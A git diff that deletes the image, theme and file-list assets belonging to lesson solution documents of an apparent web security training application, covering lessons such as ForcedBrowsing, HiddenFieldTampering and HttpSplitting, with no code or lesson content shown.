--- a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/filelist.xml b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/filelist.xml
deleted file mode 100644
index bdb35f85a..000000000
--- a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png
deleted file mode 100644
index 44e09369d..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png
deleted file mode 100644
index 1cf2cc012..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png
deleted file mode 100644
index 9f5747a75..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png
deleted file mode 100644
index 0845266c4..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg
deleted file mode 100644
index c871b0225..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image009.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg
deleted file mode 100644
index 74cec6054..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image010.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg
deleted file mode 100644
index 29defb100..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg
deleted file mode 100644
index 09d5ac828..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx b/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/FailOpenAuthentication_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/filelist.xml b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/filelist.xml
deleted file mode 100644
index 6616ecc49..000000000
--- a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/filelist.xml
+++ /dev/null
@@ -1,14 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png
deleted file mode 100644
index c9047d693..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg
deleted file mode 100644
index 101e688a4..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image002.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png
deleted file mode 100644
index 569dc0098..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg
deleted file mode 100644
index 6fe272fa4..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image004.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png
deleted file mode 100644
index f2945e2b0..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg
deleted file mode 100644
index 7ec274b62..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png
deleted file mode 100644
index a001e7963..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg
deleted file mode 100644
index 672f7af05..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/image008.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx b/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/ForcedBrowsing_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/ForgotPassword_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/filelist.xml b/src/main/webapp/lesson_solutions/ForgotPassword_files/filelist.xml
deleted file mode 100644
index ec8ce5b70..000000000
--- a/src/main/webapp/lesson_solutions/ForgotPassword_files/filelist.xml
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png
deleted file mode 100644
index 3e10c76d3..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png
deleted file mode 100644
index 11a7001dc..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png
deleted file mode 100644
index 033f2e8c8..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png
deleted file mode 100644
index 664c24a06..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png
deleted file mode 100644
index e0e2ffb7c..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png
deleted file mode 100644
index 4542c5240..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png b/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png
deleted file mode 100644
index f72055656..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg
deleted file mode 100644
index 1f670723b..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg
deleted file mode 100644
index 6f8105ce7..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg
deleted file mode 100644
index 76540dad8..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg
deleted file mode 100644
index 76c23e5ea..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg
deleted file mode 100644
index fc38db81d..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg
deleted file mode 100644
index c5a2f719f..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg b/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg
deleted file mode 100644
index 5798c0713..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx b/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/ForgotPassword_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db
deleted file mode 100644
index ccd50130d..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/filelist.xml b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/filelist.xml
deleted file mode 100644
index a94e9430b..000000000
--- a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png
deleted file mode 100644
index 3757d471d..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png
deleted file mode 100644
index e3ba2d5cd..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png
deleted file mode 100644
index 1f0d5ebef..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png
deleted file mode 100644
index a715a8db2..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png
deleted file mode 100644
index 2914f15ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg
deleted file mode 100644
index 06d8b5434..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg
deleted file mode 100644
index 3be37d0cf..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg
deleted file mode 100644
index 7feef4395..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg
deleted file mode 100644
index 6bbe14316..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg
deleted file mode 100644
index 02de6c5eb..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx b/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HtmlClues_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/filelist.xml b/src/main/webapp/lesson_solutions/HtmlClues_files/filelist.xml
deleted file mode 100644
index b8f56a1ec..000000000
--- a/src/main/webapp/lesson_solutions/HtmlClues_files/filelist.xml
+++ /dev/null
@@ -1,16 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png
deleted file mode 100644
index 16a985f95..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png
deleted file mode 100644
index 6c3b652b2..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png
deleted file mode 100644
index baccb3c43..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png
deleted file mode 100644
index 7fe1df7d1..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png b/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png
deleted file mode 100644
index 4e0f0026e..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg
deleted file mode 100644
index 5c887a646..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image011.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg
deleted file mode 100644
index 80456d498..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image012.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg
deleted file mode 100644
index 38b875113..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image013.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg
deleted file mode 100644
index 3a8f380ac..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image014.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg b/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg
deleted file mode 100644
index a9d131b57..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx b/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HtmlClues_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HttpBasics_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/filelist.xml b/src/main/webapp/lesson_solutions/HttpBasics_files/filelist.xml
deleted file mode 100644
index 2d81880c2..000000000
--- a/src/main/webapp/lesson_solutions/HttpBasics_files/filelist.xml
+++ /dev/null
@@ -1,10 +0,0 @@
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png b/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png
deleted file mode 100644
index 783a404ed..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png b/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png
deleted file mode 100644
index 7d0a0830c..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg
deleted file mode 100644
index 7b9b508a5..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image005.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg
deleted file mode 100644
index cb6599a1f..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/image006.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx b/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg
deleted file mode 100644
index 5abdf6f73..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab1.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg b/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg
deleted file mode 100644
index 982f3f7bc..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpBasics_files/webscarab2.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HttpOnly_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/filelist.xml b/src/main/webapp/lesson_solutions/HttpOnly_files/filelist.xml
deleted file mode 100644
index b6972bfed..000000000
--- a/src/main/webapp/lesson_solutions/HttpOnly_files/filelist.xml
+++ /dev/null
@@ -1,20 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png
deleted file mode 100644
index 169190729..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png
deleted file mode 100644
index 597cc80eb..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png
deleted file mode 100644
index 24e98dab8..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png
deleted file mode 100644
index 6b5f8cb64..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png
deleted file mode 100644
index 443fc7029..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png
deleted file mode 100644
index a378ec244..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png b/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png
deleted file mode 100644
index 98535fdfe..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image013.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg
deleted file mode 100644
index efbe77300..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image015.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg
deleted file mode 100644
index 195c2529b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image016.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg
deleted file mode 100644
index 91d8d9c6d..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image017.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg
deleted file mode 100644
index adc7a901e..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image018.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg
deleted file mode 100644
index acfd921d1..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image019.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg
deleted file mode 100644
index 4c564391a..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image020.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg b/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg
deleted file mode 100644
index 56107235b..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/image021.jpg and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx b/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx
deleted file mode 100644
index 55426d8ec..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpOnly_files/themedata.thmx and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml b/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml
deleted file mode 100644
index b200daa38..000000000
--- a/src/main/webapp/lesson_solutions/HttpSplitting_files/colorschememapping.xml
+++ /dev/null
@@ -1,2 +0,0 @@
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/filelist.xml b/src/main/webapp/lesson_solutions/HttpSplitting_files/filelist.xml
deleted file mode 100644
index 8b4e1e66e..000000000
--- a/src/main/webapp/lesson_solutions/HttpSplitting_files/filelist.xml
+++ /dev/null
@@ -1,34 +0,0 @@
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png
deleted file mode 100644
index a3cecc9aa..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image001.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png
deleted file mode 100644
index d62c55ea3..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image003.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png
deleted file mode 100644
index 4168195ac..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image005.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png
deleted file mode 100644
index d9f29ebed..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image007.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png
deleted file mode 100644
index c75a97ac6..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image009.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png
deleted file mode 100644
index addd9bce4..000000000
Binary files a/src/main/webapp/lesson_solutions/HttpSplitting_files/image011.png and /dev/null differ
diff --git a/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png b/src/main/webapp/lesson_solutions/HttpSplitting_files/image013.png
